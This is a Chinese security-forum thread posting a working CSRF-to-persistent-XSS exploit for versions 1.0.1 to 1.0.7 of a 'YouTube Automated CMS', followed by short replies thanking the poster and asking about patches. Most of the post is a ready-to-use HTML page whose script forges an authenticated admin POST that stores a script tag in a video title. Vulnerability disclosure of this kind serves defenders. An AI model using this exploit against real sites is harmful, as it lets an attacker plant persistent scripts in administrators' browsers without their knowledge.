查看: 29091|回复: 8

YouTube 自动化CMS 1.0.7两处XSS

[复制链接]
发表于 2016-10-19 16:14:15 | 显示全部楼层 |阅读模式
演示视频:https://youtu.be/cCtThSquNSk

CSRF to 持续性 XSS
Version: 1.0.1 to 1.0.7

CSRF Exploit Code:
[HTML] 查看源码 复制代码
<html>
  <body>
   <title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
        xhr.withCredentials = true;
        var body = "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"details\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"category_id\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"published\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"duration\"\r\n" + 
          "\r\n" + 
          "70\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"image\"\r\n" + 
          "\r\n" + 
          "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <br><br><br>
    <center>
    <h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </center>
  </body>
</html>


相关帖子

回复

使用道具 举报

发表于 2016-10-19 17:36:27 | 显示全部楼层
谢谢分享
回复

使用道具 举报

发表于 2016-10-19 18:06:21 | 显示全部楼层
APP回复测试
回复 支持 反对

使用道具 举报

发表于 2016-10-19 18:07:14 | 显示全部楼层
test?
回复 支持 反对

使用道具 举报

发表于 2016-10-19 18:18:06 | 显示全部楼层

回复 支持 反对

使用道具 举报

发表于 2016-10-20 17:15:39 | 显示全部楼层
我他妈一直新手上路
回复 支持 反对

使用道具 举报

发表于 2026-5-19 22:00:01 | 显示全部楼层

Re: YouTube 自动化CMS 1.0.7两处XSS

这个漏洞报告很清晰,CSRF 结合持久化 XSS 确实危害不小。攻击者可以构造恶意页面欺骗管理员触发,最终在后台写入恶意脚本,影响后续访问的管理员。1.0.1 到 1.0.7 都受影响,范围挺广的。希望官方能尽快修复,比如添加 CSRF token 并对用户输入做过滤/转义。感谢分享,这提醒大家注意后台表单的安全配置。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 17:45:00 | 显示全部楼层

Re: YouTube 自动化CMS 1.0.7两处XSS

感谢分享这个漏洞细节。CSRF 结合持久化 XSS 的利用链确实很典型,如果管理员未启用 CSRF 令牌或来源校验,攻击者很容易通过诱导操作植入恶意脚本。看了你给出的 exploit 代码,title 字段直接插入了闭合引号和 script 标签,触发后应该会在后台管理页面执行任意 JS。请问视频中演示的是否是这类攻击在真实环境下的完整效果?另外,方便透露该 CMS 是否有官方的修复补丁或临时缓解措施吗?
回复 支持 反对

使用道具 举报

发表于 2026-6-20 20:00:00 | 显示全部楼层

Re: YouTube 自动化CMS 1.0.7两处XSS

感谢分享这个漏洞情报。你演示的CSRF攻击链能直接造成持久XSS,看起来title参数没有做任何过滤或转义就直接入库了,影响版本从1.0.1到1.0.7范围也不小。请问你提交给官方后他们有没有给出修复计划或补丁时间表?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-5 06:56 , Processed in 0.036585 second(s), 22 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部